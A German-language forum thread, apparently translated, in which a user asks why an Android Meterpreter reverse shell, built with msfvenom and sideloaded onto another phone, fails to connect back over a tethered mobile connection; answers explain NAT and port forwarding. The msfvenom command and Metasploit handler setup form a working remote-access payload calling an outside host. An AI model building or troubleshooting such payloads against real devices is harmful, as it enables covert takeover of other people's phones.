Wie kann eine Verbindung zu einem Remote-Host ohne Router hergestellt werden?

1386
Joe_Vj _95

Zunächst einmal ist dies mein erster Beitrag, bitte ignorieren Sie dies nicht. Diese Frage haben Sie vielleicht schon gesehen. Bevor Sie dies als Duplikat markieren, verstehen Sie bitte meine Probleme. Ich habe viele Probleme. Ich benutze das für einen pädagogischen Zweck.

bitte beachten sie folgendes:

  1. Ich habe keinen Router.
  2. Ich habe Kali 2.0 (Sana) installiert.
  3. Ich verwende mein Android-Handy, um über USB-Tethering eine Verbindung zum INTERNET herzustellen.

Nun werde ich erklären, was gemacht wurde.

zunächst habe ich eine Android-Nutzlast erstellt

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk 

xxx.xxx.net ist meine no-ip registrierte DNS (versteckt mit x); dann habe ich es erfolgreich unterschrieben.

Jetzt habe ich es über Bluetooth an ein anderes Android-Gerät gesendet (die IP-Adresse meines Geräts hat sich dabei nicht geändert. Es ist auch nicht mit dem LAN verbunden). Anschließend wurde es erfolgreich installiert.

ifconfig:

# ifconfig eth0 Link encap:Ethernet HWaddr 78:24:af:bc:a8:a2  UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)  lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:1072 errors:0 dropped:0 overruns:0 frame:0 TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0  RX bytes:87360 (85.3 KiB) TX bytes:87360 (85.3 KiB)  usb0 Link encap:Ethernet HWaddr 42:c8:eb:7b:43:a9  inet addr:192.168.42.50 Bcast:192.168.42.255 Mask:255.255.255.0 inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:20535 errors:21 dropped:0 overruns:0 frame:21 TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:11073420 (10.5 MiB) TX bytes:3833297 (3.6 MiB) 

dann öffnete ich das terminal.

# msfconsole   _____________  msf > use exploit/multi/handler msf exploit(handler)  set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) set lhost 192.168.42.50 lhost => 192.168.42.50 msf exploit(handler)  set lport 4444 lport => 4444 msf exploit(handler) > exploit  [*] Started reverse handler on 192.168.42.50:4444  [*] Starting the payload handler... 

Sobald ich die App im Zielmobil geöffnet habe, wird nichts im Metasploit-Terminal empfangen.

Das gleiche funktioniert aber auch über LAN. Aber wenn es um Internet geht, scheitert es. Ich habe fast alles versucht, was ich tun kann, aber vergebens.

Ich habe festgestellt, dass die Ports in der lokalen IP-Adresse geöffnet sind.

# nmap 192.168.42.50  Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST Nmap scan report for kali (192.168.42.50) Host is up (0.0000070s latency). Not shown: 999 closed ports PORT STATE SERVICE 4444/tcp open krb524  Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds 

Sie sind jedoch in dem No-IP-registrierten DNS geschlossen.

# nmap xxx.xxx.net  Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST Nmap scan report for xxx.xxx.net (a.b.c.d) Host is up (0.22s latency).  rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in  Not shown: 990 closed ports  PORT STATE SERVICE  21/tcp filtered ftp 53/tcp filtered domain 80/tcp open http 111/tcp open rpcbind 443/tcp open https 445/tcp filtered microsoft-ds 554/tcp filtered rtsp 1723/tcp filtered pptp 3306/tcp open mysql 8022/tcp open oa-system  Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds 

Hinweis: Abcd ist die aufgelöste IP-Adresse meines DNS

Wie genau kann ich eine erfolgreiche Verbindung herstellen?

Wenn Sie denken, dass diese Frage ohnehin nicht dem Thema entspricht, schlagen Sie mir bitte eine Lösung vor.

0
Ich schlage vor, dass der Grund dafür, dass Sie nicht funktionieren, darin besteht, dass Sie den Port von Ihrer mit dem Internet verbundenen IP-Adresse an Ihr Mobiltelefon weiterleiten müssen. Die IP-Adresse in Ihrer Frage für das Mobiltelefon ist eine nicht über das Internet weiterleitbare Adresse (192.168.42.50). Wenn Sie also möchten, dass ein Host im Internet eine Verbindung mit dem Port Ihres Systems herstellen kann, müssen Sie die Portweiterleitung aktivieren. Abhängig von der Kontrolle über Ihr Netzwerk ist dies möglicherweise nicht möglich. Rоry McCune vor 8 Jahren 3
@ Roy McCune sagst du, dass was auch immer ich mache es nicht funktioniert? Joe_Vj _95 vor 8 Jahren 0
@ Joe_Vj_95 Ja. Wenn Sie von Ihrem Provider eine ordnungsgemäß geroutete Internetadresse (oder über ein VPN) erhalten, ist dies das, was er sagt. Ihr Provider verwendet eine Art NAT, um eine teilweise Internetverbindung zu Ihrem Telefon bereitzustellen. Sie benötigen volle Konnektivität. davidgo vor 8 Jahren 1

2 Antworten auf die Frage

0
Rоry McCune

OK, lassen Sie mich eine Antwort auf die Antwort geben, aber zuerst werde ich noch einmal klarstellen, was Sie meiner Meinung nach erreichen wollen, um sicherzustellen, dass ich die Dinge nicht missverstehe.

Sie haben ein System mit Kali Linux, das Internetzugang über ein USB-Mobiltelefon erhält, das eine RFC1918-Adresse (dh nicht über das Internet geroutet) von 192.168.42.50 bereitstellt.

Sie richten eine Android-Reverse-Shell mit Metasploit ein und geben dabei Ihre routbare Internetadresse an

Verwenden Sie dann Exploit / Multi / Handler, um Port 4444 an Ihrer lokalen nicht routbaren Adresse zu überwachen.

Das Problem ist, dass Ihr Port zwar im lokalen LAN zu hören ist, Sie ihn jedoch nicht von einem mit dem Internet verbundenen Gerät sehen können, wenn die Payload geliefert wird.

Port-Scans auf der routbaren Internet-Adresse zeigen keine offenen Ports.

-

Angenommen, alles ist korrekt, dann besteht das Problem darin, dass Sie keine "Portweiterleitung" von der Internetadresse zu Ihrer lokalen Metasploit-Instanz konfiguriert haben.

Normalerweise würde dies normalerweise der Fall sein, wenn Sie die Kontrolle über das Gerät mit der Internetadresse an einer seiner Schnittstellen haben, dass Sie den Port 4444 / TCP von dieser Schnittstelle an Ihr internes System auf 192.168.42.50 weiterleiten.

Wenn Sie dies einrichten können, sollte das, was Sie beschreiben, funktionieren. Wenn Sie keinen Zugang zum Erstellen einer "Portweiterleitung" haben, funktioniert das, was Sie beschreiben, nicht, da das Ziel, das den Exploit im Internet ausführt, keine Verbindung herstellen kann.

0
Duncan X Simpson

Sie haben einen Router - Ihr Telefon. Ihr Telefon routet zwischen 192.168. Adressen und Internetadressen. Das Problem ist, dass Sie auf Ihrem Telefon keinen Port weitergeleitet haben. Es ist wahrscheinlich möglich, aber es wird nicht einfach sein. Sie benötigen wahrscheinlich Root-Zugriff und verwenden iptables. An diesem Punkt möchten Sie wahrscheinlich auf android.se fragen, wo Sie wahrscheinlich eine bessere Antwort erhalten.

Hinweis: Das hört sich nach einem XY-Problem an. Was ist der Zweck davon? Es gibt wahrscheinlich einen besseren Weg, um das zu tun, was Sie wollen.